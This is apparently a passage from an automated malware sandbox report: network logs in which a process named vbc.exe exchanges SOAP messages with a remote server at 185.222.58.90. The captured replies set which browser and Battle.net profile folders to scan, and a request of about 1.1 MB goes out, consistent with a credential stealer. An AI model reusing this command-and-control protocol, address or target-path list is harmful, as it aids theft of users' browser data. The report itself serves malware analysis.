Jun 20, 2022 05:29:59.836102962 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836119890 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.836180925 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836258888 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836291075 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836393118 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836421013 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836446047 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836453915 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.836522102 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836529016 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.836600065 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836630106 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836746931 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836776972 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836802006 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836829901 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836858034 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836937904 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836963892 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.836990118 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.837220907 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.837246895 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.837338924 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.837419033 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.837447882 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.837474108 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.840559959 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.851825953 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.851912022 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.851937056 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.851965904 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.851994038 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.852018118 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.852044106 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.858947039 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.858975887 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859003067 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859028101 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859054089 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859081984 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859085083 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.859158993 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.859239101 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859438896 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.859483957 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.859635115 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.859711885 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.859785080 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.881696939 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.881752014 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.881947994 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.882005930 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882208109 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882275105 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.882472038 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882500887 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882569075 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882596970 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882632017 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.882683992 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.882885933 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.883158922 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.883395910 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.883718967 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.883873940 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.884155989 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.884356022 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.884639025 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.884872913 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885157108 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885413885 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885680914 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885706902 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885735035 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885765076 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885790110 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885818005 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.885994911 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.887156963 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904551983 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904587984 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904618025 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904643059 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904670954 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904699087 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904725075 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904751062 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904841900 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.904872894 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.904936075 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.905090094 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.927422047 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.927473068 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.927613020 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.944564104 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.944612026 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.944642067 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.944673061 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.944690943 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.944717884 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.950037003 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.950174093 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.972621918 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.972794056 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:59.973325968 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.973359108 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.973383904 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.973473072 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.973503113 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.973589897 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.990288973 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.995312929 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:59.995480061 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:30:00.000228882 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000274897 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000303030 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000332117 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000360012 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000387907 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000529051 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000559092 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000583887 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000658035 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000686884 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000749111 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000775099 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.000871897 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.018424988 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.018559933 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:30:00.041099072 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.041443110 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:30:00.041651964 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:30:00.047038078 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.047069073 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.047095060 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.047188997 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.047226906 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.064291000 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.065371037 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.065402031 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.065428972 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.065454960 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.066319942 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.066756010 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.066916943 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.066945076 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.091840982 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.095254898 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.095285892 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.095310926 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.144274950 CEST	17910	49834	185.222.58.90	192.168.2.3
Jun 20, 2022 05:30:00.187062025 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:30:00.452136993 CEST	49834	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:30:00.452545881 CEST	49823	17910	192.168.2.3	185.222.58.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 20, 2022 05:28:49.362767935 CEST	57723	53	192.168.2.3	8.8.8.8
Jun 20, 2022 05:28:49.393764973 CEST	58116	53	192.168.2.3	8.8.8.8
Jun 20, 2022 05:29:29.683635950 CEST	55151	53	192.168.2.3	8.8.8.8
Jun 20, 2022 05:29:29.717645884 CEST	59795	53	192.168.2.3	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 20, 2022 05:28:49.362767935 CEST	192.168.2.3	8.8.8.8	0x8f49	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Jun 20, 2022 05:28:49.393764973 CEST	192.168.2.3	8.8.8.8	0xb87b	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Jun 20, 2022 05:29:29.683635950 CEST	192.168.2.3	8.8.8.8	0xb65e	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Jun 20, 2022 05:29:29.717645884 CEST	192.168.2.3	8.8.8.8	0x9612	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
Jun 20, 2022 05:28:49.383013010 CEST	8.8.8.8	192.168.2.3	0x8f49	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net	CNAME (Canonical name)	IN (0x0001)
Jun 20, 2022 05:28:49.414277077 CEST	8.8.8.8	192.168.2.3	0xb87b	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net	CNAME (Canonical name)	IN (0x0001)
Jun 20, 2022 05:29:29.705398083 CEST	8.8.8.8	192.168.2.3	0xb65e	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net	CNAME (Canonical name)	IN (0x0001)
Jun 20, 2022 05:29:29.740264893 CEST	8.8.8.8	192.168.2.3	0x9612	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net	CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.222.58.90:17910

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49742	185.222.58.90	17910	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 20, 2022 05:28:38.976849079 CEST	1327	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.90:17910 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 20, 2022 05:28:39.367479086 CEST	1327	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:28:39.727185011 CEST	1328	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:28:38 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 20, 2022 05:28:48.538961887 CEST	1466	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.90:17910 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 20, 2022 05:28:48.631922007 CEST	1467	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:28:48.962007999 CEST	1477	IN	HTTP/1.1 200 OK Content-Length: 4793 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:28:48 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 30 33 2e 31 31 33 2e 31 34 31 2e 32 35 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 42 6c 6f 63 6b 65 64 49 50 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.113.141.252</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49759	185.222.58.90	17910	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 20, 2022 05:29:07.441262007 CEST	1521	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.90:17910 Content-Length: 1108528 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 20, 2022 05:29:07.528793097 CEST	1521	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:29:09.297271967 CEST	2632	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:29:08 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Jun 20, 2022 05:29:09.300890923 CEST	2632	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.90:17910 Content-Length: 1108520 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 20, 2022 05:29:09.383013964 CEST	2633	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:29:10.815898895 CEST	3748	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:29:10 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
